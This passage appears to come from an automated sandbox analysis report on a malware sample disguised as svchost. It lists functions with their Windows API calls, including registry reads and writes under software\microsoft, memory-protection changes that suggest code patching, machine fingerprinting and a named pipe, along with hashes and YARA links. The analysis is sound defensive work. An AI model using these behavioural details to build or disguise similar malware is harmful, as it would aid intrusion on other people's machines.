                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 7577584ba$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-923487616
                                                                                                                                                                                                              • Opcode ID: 97de625a1e215dffa6d580dfa12643b17ba7c6f6177ebda74a8dffc7288e6002
                                                                                                                                                                                                              • Instruction ID: 29308b3187ee17b6cc657f24128a84f25177d3f22170563285d88233978e81cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97de625a1e215dffa6d580dfa12643b17ba7c6f6177ebda74a8dffc7288e6002
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92213675E40209FBEB10DBE4CC95FEEBBB8FF44704F504659E502E6240EBB5A6548B90
                                                                                                                                                                                                              Function 02669160 Relevance: 15.4, APIs: 8, Strings: 2, Instructions: 394COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                                                              • API String ID: 0-1626504983
                                                                                                                                                                                                              • Opcode ID: 4ff45c2a61eb41d4ff868b99bf480635e14eed9553d89c19bd2d36ba767191e0
                                                                                                                                                                                                              • Instruction ID: 5186632ac89a19f54dbbdffb0195980250b49601e518fe3ea44dcb0848e1ed79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ff45c2a61eb41d4ff868b99bf480635e14eed9553d89c19bd2d36ba767191e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FF1C171A052588BCF25CF68C8847EEBBB9EF84314F1485DAEC08AB345D7719A85CF91
                                                                                                                                                                                                              Function 02669780 Relevance: 15.1, APIs: 10, Instructions: 97memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00004070,76F90F00,00000000,76F92F00,?,02653CE8,?), ref: 02669793
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02653CE8,?), ref: 02669796
                                                                                                                                                                                                              • memset.MSVCRT ref: 026697AB
                                                                                                                                                                                                              • CreateFileA.KERNEL32(02653CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02653CE8,?), ref: 02669802
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02653CE8,?), ref: 02669825
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02653CE8,?), ref: 02669828
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02653CE8,?), ref: 02669834
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02653CE8,?), ref: 02669837
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,02653CE8,?), ref: 0266984A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02653CE8,?), ref: 0266984D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$CreateFileFreeValidatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 604365451-0
                                                                                                                                                                                                              • Opcode ID: 1aed69a6742076698fe2d881140a33f6da48f6d0c9f98f208ef11c496755eda0
                                                                                                                                                                                                              • Instruction ID: d37c90a350d8bd8a887661c07f91464f053befbf4ce84e8d7efa559276d3fba5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1aed69a6742076698fe2d881140a33f6da48f6d0c9f98f208ef11c496755eda0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D316BB1902341AFD7309F669888B26FAE8FB48714F418E2EE69AC7640C7709480CB61
                                                                                                                                                                                                              Function 02654630 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654664
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,00000000,00000000), ref: 02654687
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,00000000,00000000), ref: 026546AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015,?,00000000,00000000), ref: 0265471D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02654724
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654734
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000002,?,00000000,00000000), ref: 02654762
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4043890984-3673152959
                                                                                                                                                                                                              • Opcode ID: 85300d1039ff9eeb0405e500d7f4b3c06bb4562d9d0297c53c1a60a2327faaf1
                                                                                                                                                                                                              • Instruction ID: 82fd4d6525a4940d8f257ee5dc7f887c79e64da7fd11b1b5c61d352bda20e326
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85300d1039ff9eeb0405e500d7f4b3c06bb4562d9d0297c53c1a60a2327faaf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55311C32D01269ABCB22CE648C58FDF7BF8AF86704F1542D4ED5597300DB709A89CBA0
                                                                                                                                                                                                              Function 0265A140 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265A147
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0265A159
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,0265A33F,?,0265A33F), ref: 0265A173
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(0265A33F,757759d9a,00000000,00000004,00000004,00000004,0265A33F), ref: 0265A190
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 0265A19A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0265A1A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                              • String ID: 757759d9a$software\microsoft
                                                                                                                                                                                                              • API String ID: 287100044-774380122
                                                                                                                                                                                                              • Opcode ID: 95f653e9720a6c24c050c13768acd432e31f34cebd44f1a2da60ab1b1c824596
                                                                                                                                                                                                              • Instruction ID: 813e6c7c67605f59f4a53974ea9a23e2737c5688009b26e746660f1c6fadbd66
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95f653e9720a6c24c050c13768acd432e31f34cebd44f1a2da60ab1b1c824596
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36F04F79A81218FBE710ABA0DD49FEE7B78AB04B01F914644FA03A6280D7715A508BE1
                                                                                                                                                                                                              Function 02665A50 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02665A7F
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02665AB8
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02665B23
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02665B86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                              • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$75775945a$8A99A6EF
                                                                                                                                                                                                              • API String ID: 2823094833-3530877415
                                                                                                                                                                                                              • Opcode ID: f0a512871895acad760ff91b397f1b9ac68bcbd5df98b2408465a7dcc3f68cd9
                                                                                                                                                                                                              • Instruction ID: ec993a2b62d18bb5649bfeab8e1c2401b7d3230f319309f7a6083e08602ff47b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0a512871895acad760ff91b397f1b9ac68bcbd5df98b2408465a7dcc3f68cd9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF413C71A00109ABD714CF68CD99BFEF7FAEF94300F9541A5D549AB280D6B16F49C740
                                                                                                                                                                                                              Function 02655AF0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02655B18
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02656C37,75775eaca,00000000,?,00000000,?), ref: 02655B5A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02656C37), ref: 02655B64
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(-80000001), ref: 02655B2A
                                                                                                                                                                                                                • Part of subcall function 02643420: IsUserAnAdmin.SHELL32 ref: 02643428
                                                                                                                                                                                                                • Part of subcall function 02643420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02655B76), ref: 0264345F
                                                                                                                                                                                                                • Part of subcall function 02643420: RegQueryValueExA.ADVAPI32(02655B76,7577584ba,00000000,?,00000000,?), ref: 0264347C
                                                                                                                                                                                                                • Part of subcall function 02643420: RegCloseKey.ADVAPI32(02655B76), ref: 02643486
                                                                                                                                                                                                                • Part of subcall function 02643420: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 026434B9
                                                                                                                                                                                                                • Part of subcall function 02643420: RegQueryValueExA.KERNEL32(?,7577584ba,00000000,?,00000000,?), ref: 026434D6
                                                                                                                                                                                                                • Part of subcall function 02643420: RegCloseKey.ADVAPI32(?), ref: 026434E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 75775115a$75775eaca$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-987337165
                                                                                                                                                                                                              • Opcode ID: 349eb232715dc016fdb0e8543de66db179cd2264ba1034ef052e2ef41b67715c
                                                                                                                                                                                                              • Instruction ID: 5d397e3cf0487328ebea9f7a3c333c04a0a6cce3c069261d79ab5bfa99584382
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 349eb232715dc016fdb0e8543de66db179cd2264ba1034ef052e2ef41b67715c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F018CB5A90209ABDB10DAF4CD49FEEB7BCAB04604F904648F916E6280EB7496408B90
                                                                                                                                                                                                              Function 0265A540 Relevance: 12.1, APIs: 8, Instructions: 139memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,76F8F550,00000000,753CBD50,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A578
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A5A0
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000040,026598DA,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A635
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,00000040,026598DA,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A64A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,026598DA,?,?,?,00000000,00000000,?,?,?,?,?,?,026598DA,00000000), ref: 0265A67A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,026598DA,?,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A686
                                                                                                                                                                                                                • Part of subcall function 0265A6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,0265A693,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A6BC
                                                                                                                                                                                                                • Part of subcall function 0265A6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A6C6
                                                                                                                                                                                                                • Part of subcall function 0265A6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A6CD
                                                                                                                                                                                                                • Part of subcall function 0265A6B0: memset.MSVCRT ref: 0265A6DE
                                                                                                                                                                                                                • Part of subcall function 0265A6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A72A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,76F8F550,00000000,753CBD50,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A697
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,?,?,?,026598DA,00000000,02659730,0269A04C), ref: 0265A69E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2609073853-0
                                                                                                                                                                                                              • Opcode ID: 3f1d5c75586c6703a4a93ec52cabc62579929d502b1f74f3619961fffe88a17d
                                                                                                                                                                                                              • Instruction ID: 493331c13aba54b65cbe0b8b764c96c607c59b16811964aee9cab93527832a25
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f1d5c75586c6703a4a93ec52cabc62579929d502b1f74f3619961fffe88a17d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50411976A00226ABCB109FB88C84FBE7B6AEF44614F45472CF94697384DB35DD05C7A0
                                                                                                                                                                                                              Function 02668FF0 Relevance: 10.6, APIs: 7, Instructions: 75memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,026694A4,00000000,00140B17), ref: 02669005
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,026694A4,00000000,00140B17), ref: 0266900C
                                                                                                                                                                                                              • memset.MSVCRT ref: 0266901F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,026694A0,?,026694A4,00000000,00140B17), ref: 026690CE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,026694A4,00000000,00140B17), ref: 026690D1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,026694A4,00000000,00140B17), ref: 026690DD
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,026694A4,00000000,00140B17), ref: 026690E0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$AllocateFreeValidatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 219023833-0
                                                                                                                                                                                                              • Opcode ID: f8aa2d8a925daae79f21a952dc4e47318a5186116241e83ae10eabda492c0a52
                                                                                                                                                                                                              • Instruction ID: 39db19ff5581b6c2850bcddf39df7053f6db9020cb6550e8791b6b359a112628
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8aa2d8a925daae79f21a952dc4e47318a5186116241e83ae10eabda492c0a52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F21A2B0602740ABC721AF75D9886ABBFE9EF45314F00891DE55E8B300C7749445CFD2
                                                                                                                                                                                                              Function 00402360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                              • API String ID: 3225117150-898603304
                                                                                                                                                                                                              • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                              Function 0265A7B0 Relevance: 10.6, APIs: 7, Instructions: 72memorysynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8), ref: 0265A7CB
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 0265A818
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0265A847
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000), ref: 0265A84E
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 0265A862
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 0265A879
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265A881
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 842647815-0
                                                                                                                                                                                                              • Opcode ID: e009ad9649fcb94f36813f574abeb23a9555f13f9d64fed2a3cbb094edc38cae
                                                                                                                                                                                                              • Instruction ID: 7c50dd3b47baffe5e18f528474b7013a3729adf69c7966bdbdc2f53547477aa1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e009ad9649fcb94f36813f574abeb23a9555f13f9d64fed2a3cbb094edc38cae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA212875A40701EFD718CF55D994E2AB7B5FB48700F518A08EA4A5B790CB34FD51CB90
                                                                                                                                                                                                              Function 026478E0 Relevance: 10.6, APIs: 7, Instructions: 64memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 026474A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02654E91,?,00000000), ref: 026474C6
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 026474E4
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 0264750D
                                                                                                                                                                                                                • Part of subcall function 026474A0: RtlAllocateHeap.NTDLL(00000000,?,?,02654E91,?,00000000,?,?,00000000), ref: 02647514
                                                                                                                                                                                                                • Part of subcall function 026474A0: memset.MSVCRT ref: 02647527
                                                                                                                                                                                                                • Part of subcall function 026474A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02647553
                                                                                                                                                                                                                • Part of subcall function 026474A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02647563
                                                                                                                                                                                                                • Part of subcall function 026474A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02647572
                                                                                                                                                                                                                • Part of subcall function 026474A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02647585
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647594
                                                                                                                                                                                                                • Part of subcall function 026474A0: HeapValidate.KERNEL32(00000000), ref: 0264759B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,76F92F00,02653D3F), ref: 0264791C
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02647923
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647933
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,76F92F00,02653D3F), ref: 02647955
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02647958
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647965
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02647968
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$AllocateValidatememset$CreateFreeLockPointerReadSizeUnlock
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3862602232-0
                                                                                                                                                                                                              • Opcode ID: 9b4d3612914a4325b587957d693da7831c8118e693e0aca4fca3e4eed59e9b9e
                                                                                                                                                                                                              • Instruction ID: 9d55f967c22aacb4443b72648578bd0cd81f079924b9596e222212de1024057d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b4d3612914a4325b587957d693da7831c8118e693e0aca4fca3e4eed59e9b9e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB110E32B01205BBD721AAA59C48F5FBA6CEF88B61F510228F805E7380DF70D90086E0
                                                                                                                                                                                                              Function 026438A0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000102,?,?,?,02643B25,?), ref: 026438C0
